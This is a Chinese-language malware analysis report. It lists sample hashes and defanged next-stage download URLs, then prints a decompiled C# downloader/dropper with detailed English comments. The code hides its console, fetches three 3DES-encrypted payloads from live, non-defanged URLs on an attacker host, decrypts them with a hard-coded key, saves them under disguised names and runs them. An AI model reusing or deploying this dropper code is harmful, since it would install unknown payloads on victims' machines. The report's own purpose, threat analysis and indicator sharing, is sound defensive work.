样本来源
如下图
样本MD5:
1817cd95e422a9094d91c6d61c2ba8cc
d78e8943a1a2932d094957ef47956324
对应SHA256:
ac80eb10f16f3da1651b8fcb7dbc714255f4ec9719e922baeeb3499d9bd89e23
3fbbbb3ba6f63bf7d789cb845a33dcc457f0dcd73c45e53622dbd2c54fb5ca0e
下一轮样本下载地址:
http[:]//www.mojochamps.com/xim/m/p.php
http[:]//www.mojochamps.com/xim/m/sc.php
http[:]//www.mojochamps.com/xim/m/o.php
https[:]//tinyurl.com/pismal
https[:]//tinyurl.com/scoscsc
https[:]//tinyurl.com/oooooooo0
样本分析
在互联网上只发现了其中的2个样本,均为C#语言编写,代码流程比较简单:先隐藏自身控制台窗口,再从www.mojochamps.com分三次下载经3DES(ECB)加密的内容,保存到ApplicationData、CommonApplicationData目录,解密后以伪装的文件名(scanned-img.png、p.vbs、siemence.exe)落地并通过Process.Start运行;其中%APPDATA%\taswala.txt同时被用作"已执行"标记,该文件存在时不再下载,直接重新启动scanned-img.png。代码具体如下:
// Decompiled first-stage downloader/dropper (C#), kept verbatim as evidence
// for the sample hashes above -- do NOT build or execute it.
// Behaviour visible in this listing: hide the process's console window, fetch
// three encrypted blobs from www.mojochamps.com, decrypt each with springs(),
// write the plaintext under %APPDATA% / %PROGRAMDATA% with disguised file
// names, and launch each one with Process.Start. Note that the URL literals in
// Main are live (not defanged, unlike the IOC list above this code).
// There is no try/catch anywhere: a failed download, a missing file or a bad
// base64 string throws and terminates the process.
namespace Smixblix
{
    internal class Tkmxk
    {
        // Win32 P/Invokes used only to hide the console window. Both are
        // declared with int rather than IntPtr for the window handle (likely a
        // decompiler artefact); on x64 that truncates the handle.
        [DllImport("user32.dll")]
        private static extern int ShowWindow(int Handle, int showState);
        [DllImport("kernel32.dll")]
        public static extern int GetConsoleWindow();

        // Entry point. First run (marker file absent): download -> decrypt ->
        // drop -> launch three payloads in sequence, with fixed sleeps between
        // steps. Later runs: only re-launch the first dropped file.
        private static void Main(string[] args)
        {
            // showState 0 == SW_HIDE: the console of this process disappears.
            int consoleWindow = Tkmxk.GetConsoleWindow();
            Tkmxk.ShowWindow(consoleWindow, 0);
            // Never read; the same lookup is repeated inline further down.
            string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData);
            // Single-character fragments that are concatenated into the
            // extensions ".png" / ".vbs" / ".exe" below -- presumably to keep
            // those extension strings out of the binary's string table.
            string text = "p";
            string text2 = "x";
            string text3 = "e";
            string text4 = "n";
            string text5 = "g";
            string text6 = ".";
            string text7 = "v";
            string text8 = "b";
            string text9 = "s";
            // text10: %APPDATA%\taswala.txt -- ciphertext of p.php. Its
            // existence is also the "already ran" marker checked below.
            string text10 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\taswala.txt";
            // text11: %APPDATA%\scanned-img.png -- decrypted payload #1.
            // The .png name is a disguise; what the blob really is cannot be
            // told from this listing.
            string text11 = string.Concat(new string[]
            {
                Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                "\\scanned-img",
                text6,
                text,
                text4,
                text5
            });
            // text12: %APPDATA%\khat.txt -- ciphertext of sc.php.
            string text12 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\khat.txt";
            // text13: %APPDATA%\p.vbs -- decrypted payload #2 (script).
            string text13 = string.Concat(new string[]
            {
                Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                "\\p",
                text6,
                text7,
                text8,
                text9
            });
            // text14: %PROGRAMDATA%\BBMN.txt -- ciphertext of o.php.
            string text14 = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\BBMN.txt";
            // text15: %PROGRAMDATA%\siemence.exe -- decrypted payload #3.
            string text15 = string.Concat(new string[]
            {
                Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData),
                "\\siemence",
                text6,
                text3,
                text2,
                text3
            });
            // First-run detection: the downloaded ciphertext doubles as the marker.
            bool flag = !File.Exists(text10);
            if (flag)
            {
                // Plain HTTP, no TLS, no integrity check on what is fetched.
                // The WebClient is never disposed.
                WebClient webClient = new WebClient();
                // Stage 1: p.php -> taswala.txt -> scanned-img.png -> run.
                webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/p.php"), text10);
                Thread.Sleep(1000);
                string c = File.ReadAllText(text10);
                string s = Tkmxk.springs(c);
                // springs() returns a base64 string; decode it again to get
                // the raw payload bytes (double base64 layering, see springs).
                byte[] bytes = Convert.FromBase64String(s);
                Thread.Sleep(1000);
                File.WriteAllBytes(text11, bytes);
                // Process.Start(string) -- on .NET Framework (which this code's
                // API choices suggest) that shell-executes, so the handler
                // registered for the extension decides how the file runs.
                Process.Start(text11);
                Thread.Sleep(15000);
                // Stage 2: sc.php -> khat.txt -> p.vbs -> run.
                webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/sc.php"), text12);
                Thread.Sleep(1000);
                string c2 = File.ReadAllText(text12);
                string s2 = Tkmxk.springs(c2);
                byte[] bytes2 = Convert.FromBase64String(s2);
                File.WriteAllBytes(text13, bytes2);
                Thread.Sleep(15000);
                Process.Start(text13);
                // Stage 3: o.php -> BBMN.txt -> siemence.exe -> run.
                webClient.DownloadFile(new Uri("http://www.mojochamps.com/xim/m/o.php"), text14);
                Thread.Sleep(15000);
                string c3 = File.ReadAllText(text14);
                string s3 = Tkmxk.springs(c3);
                byte[] bytes3 = Convert.FromBase64String(s3);
                File.WriteAllBytes(text15, bytes3);
                Thread.Sleep(26000);
                Process.Start(text15);
            }
            else
            {
                // Re-run path: only the first dropped file is launched again;
                // p.vbs and siemence.exe are not re-started from here.
                Process.Start(text11);
            }
        }

        // Decrypts one downloaded blob. Layering as the code shows:
        //   base64 text -> 3DES-ECB decrypt (PKCS7 padding) -> UTF-8 string,
        //   which the caller then base64-decodes again to get the payload.
        // Key = MD5("new Stream()"), 16 bytes, so TripleDES runs in two-key
        // mode (K3 = K1). ECB means no IV is involved. Together with the
        // dropped .txt files this is enough to write a standalone decryptor.
        // C: base64 ciphertext as read from the dropped .txt file.
        // Throws FormatException / CryptographicException on bad input.
        public static string springs(string C)
        {
            byte[] array = Convert.FromBase64String(C);
            MD5CryptoServiceProvider md5CryptoServiceProvider = new MD5CryptoServiceProvider();
            // Static, hard-coded key derivation: MD5 of a fixed literal.
            byte[] key = md5CryptoServiceProvider.ComputeHash(Encoding.UTF8.GetBytes("new Stream()"));
            md5CryptoServiceProvider.Clear();
            TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
            tripleDESCryptoServiceProvider.Key = key;
            tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;
            tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
            ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor();
            byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
            tripleDESCryptoServiceProvider.Clear();
            return Encoding.UTF8.GetString(bytes);
        }

        // Same literal as the key material in springs(); not referenced
        // anywhere in this listing (the decompiler may have inlined it).
        private const string classes = "new Stream()";
    }
}